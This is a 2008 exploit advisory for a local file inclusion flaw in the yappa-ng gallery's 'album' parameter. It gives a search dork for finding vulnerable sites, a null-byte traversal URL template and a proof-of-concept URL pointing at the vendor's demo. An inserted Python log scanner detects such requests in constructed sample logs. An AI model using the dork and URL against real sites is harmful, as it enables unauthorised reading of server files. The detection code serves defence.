
# Title : yappa-ng <= 2.3.3-beta0 (album) Local File Inclusion Vulnerability
# Published : 2008-10-19
# Author : Vrs-hCk


[o]------------------------------------------------------------------------------------[x]
 |  Local File Include Vulnerability                                                    |
[o]------------------------------------------------------------------------------------[o]
 |  Software : yappa-ng Version 2.3.2                                                   |
 |  Vendor   : http://www.zirkon.at/zirkon/scripts/yappa-ng/yappa-ng_main_eng.html      |
 |  Date     : 19 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
 |  Contact  : d00r[at]telkom[dot]net                                                   |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    "Powered by yappa-ng 2.3.2"

[»] Exploit

    http://[site]/[yappa-ng-path]/index.php?album=[LFI]%00

[»] Proof of Concept

    http://www.zirkon.at/yappa-ng_demo/index.php?album=[LFI]%00
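
For defenders, the request shape above (an `album` value followed by an encoded null byte) can be hunted for in web server logs. The following is an added example, not part of the original advisory or of yappa-ng: it assumes combined-format access logs and that legitimate album values are relative folder names; the `/gallery/` path and all sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e) up to max_rounds."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def album_findings(value):
    """Return the reasons an `album` value looks like a file inclusion attempt."""
    value = fully_decode(value)
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    segments = re.split(r"[\\/]+", value.replace("\x00", ""))
    if ".." in segments:
        reasons.append("traversal")
    if value.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", value):
        reasons.append("absolute-path")
    return reasons

def scan(lines, param="album"):
    """Return (line_number, reasons) for log lines with a suspicious album value."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        query = urlsplit(m.group(1)).query if m else ""
        for key, val in parse_qsl(query, keep_blank_values=True):
            reasons = album_findings(val) if key == param else []
            if reasons:
                hits.append((n, reasons))
    return hits

# Constructed sample log lines (documentation address range, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [19/Oct/2008:10:00:01 +0000] "GET /gallery/index.php?album=holiday%2F2008 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [19/Oct/2008:10:00:07 +0000] "GET /gallery/index.php?album=..%2F..%2Fconstructed.txt%00 HTTP/1.1" 200 311',
    '192.0.2.44 - - [19/Oct/2008:10:00:09 +0000] "GET /gallery/index.php?album=photos%2500 HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE):
        print(n, ",".join(reasons))
```

The third sample line shows why the value is decoded repeatedly: a double-encoded null byte (`%2500`) only becomes visible after a second decoding pass.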

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
 |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, NgL, ScanneD, }^-^{, eminem,             |
 |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, dkk ...                  |
 |  c0li.m0de.0n & BeHave oR BeGone !!!                                                 |
[o]------------------------------------------------------------------------------------[o]

# www.Syue.com [2008-10-19]